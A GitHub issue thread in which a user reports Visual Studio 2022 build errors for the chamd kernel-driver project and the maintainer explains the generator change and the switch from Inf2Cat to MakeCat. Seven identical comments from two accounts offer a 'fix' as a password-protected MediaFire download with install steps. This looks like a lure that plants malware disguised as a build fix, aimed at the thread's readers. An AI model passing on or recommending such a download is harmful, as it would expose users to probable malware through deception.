### ISSUE TITLE
Visual studio 2022 support

### ISSUE THREAD

**Issue by epiclyrizzy** [dmarov/chamd#19]
C:\Users\Mike\Desktop\chamd\chamd>npm run all

> all
> node --unhandled-rejections=strict ./scripts/builder.js all

Generating nexusswipeathing driver ...
Compiling
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Executing: "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvarsall.bat" amd64 && cd "C:\Users\Mike\Desktop\chamd\chamd\build\" && cmake -G "Visual Studio 16 2019" "C:\Users\Mike\Desktop\chamd\chamd\src\" && cmake --build . --config Release
**********************************************************************
** Visual Studio 2022 Developer Command Prompt v17.11.2
** Copyright (c) 2022 Microsoft Corporation
**********************************************************************
[vcvarsall.bat] Environment initialized for: 'x64'
CMake Error at CMakeLists.txt:2 (project):
  Generator

    Visual Studio 16 2019

  could not find any instance of Visual Studio.

-- Configuring incomplete, errors occurred!

node:internal/process/esm_loader:108
    internalBinding('errors').triggerUncaughtException(
                              ^
undefined
(Use `node --trace-uncaught ...` to show where the exception was thrown)

Node.js v18.18.2

C:\Users\Mike\Desktop\chamd\chamd>

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by dmarov** [comment]
Recently I had some trouble of making to compile with VS2022.
```
The system cannot find the path specified.
[vcvarsall.bat] Environment initialized for: 'x64'
-- The C compiler identification is unknown
-- The CXX compiler identification is unknown
CMake Error at CMakeLists.txt:2 (project):
  No CMAKE_C_COMPILER could be found.
```

The problem seems to be related to https://discourse.cmake.org/t/cannot-set-toolset-when-configuring-with-the-visual-studio-2022-generator/10160

I recommend to use VS2019 for now, but if you'd like to use VS2022, than generator should be
```
Visual Studio 17 2022
```
for sure.

**Comment by epiclyrizzy** [comment]
yea it works now but i just get this error in the ultimap2.c

  1>Checking Build System
  Building Custom Rule C:/Users/Mike/Desktop/chamd/chamd/src/CMakeLists.txt
  Assembling C:\Users\Mike\Desktop\chamd\chamd\src\amd64\dbkfunca.asm...
MASM : warning A4018: invalid command-line option : /Gz [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /GF [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /GR- [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /kernel [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /FIwarning.h [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /FIC:/Users/Mike/Desktop/chamd/chamd/build/CMakeFiles/wdkflags.h [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
  Assembling C:\Users\Mike\Desktop\chamd\chamd\src\amd64\debuggera.asm...
MASM : warning A4018: invalid command-line option : /Gz [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /GF [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /GR- [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /kernel [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /FIwarning.h [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /FIC:/Users/Mike/Desktop/chamd/chamd/build/CMakeFiles/wdkflags.h [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
  Assembling C:\Users\Mike\Desktop\chamd\chamd\src\amd64\noexceptionsa.asm...
MASM : warning A4018: invalid command-line option : /Gz [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /GF [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /GR- [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /kernel [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /FIwarning.h [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /FIC:/Users/Mike/Desktop/chamd/chamd/build/CMakeFiles/wdkflags.h [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
  Assembling C:\Users\Mike\Desktop\chamd\chamd\src\amd64\ultimapa.asm...
MASM : warning A4018: invalid command-line option : /Gz [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /GF [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /GR- [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /kernel [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /FIwarning.h [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /FIC:/Users/Mike/Desktop/chamd/chamd/build/CMakeFiles/wdkflags.h [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
  Assembling C:\Users\Mike\Desktop\chamd\chamd\src\amd64\vmxhelpera.asm...
MASM : warning A4018: invalid command-line option : /Gz [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /GF [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /GR- [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /kernel [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /FIwarning.h [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /FIC:/Users/Mike/Desktop/chamd/chamd/build/CMakeFiles/wdkflags.h [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
  Assembling C:\Users\Mike\Desktop\chamd\chamd\src\amd64\vmxoffloada.asm...
MASM : warning A4018: invalid command-line option : /Gz [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /GF [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /GR- [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /kernel [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /FIwarning.h [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
MASM : warning A4018: invalid command-line option : /FIC:/Users/Mike/Desktop/chamd/chamd/build/CMakeFiles/wdkflags.h [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
  DBKDrvr.c
  DBKFunc.c
  debugger.c
  deepkernel.c
  interruptHook.c
  IOPLDispatcher.c
  memscan.c
  noexceptions.c
  processlist.c
  threads.c
  ultimap.c
  ultimap2.c
  apic.c
  vmxhelper.c
C:\Users\Mike\Desktop\chamd\chamd\src\ultimap2.c(1688,3): error C2220: the following warning is treated as an error [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
C:\Users\Mike\Desktop\chamd\chamd\src\ultimap2.c(1688,3): warning C4090: 'function': different 'volatile' qualifiers [C:\Users\Mike\Desktop\chamd\chamd\build\iceyrazerbowl.vcxproj]
  vmxoffload.c
  Generating Code...

node:internal/process/esm_loader:108
    internalBinding('errors').triggerUncaughtException(
                              ^
undefined
(Use `node --trace-uncaught ...` to show where the exception was thrown)

Node.js v18.18.2

C:\Users\Mike\Desktop\chamd\chamd>

**Comment by epiclyrizzy** [comment]
I degraded down to visual studio 2019 but now i just cannot find inf2cat.exe people are saying its not avaliable anymore can u give me a download for it

**Comment by dmarov** [comment]
Figured out that Inf2Cat is deprecated, MakeCat should be used instead.
master branch has been updated to use visual studio 2022 and MakeCat
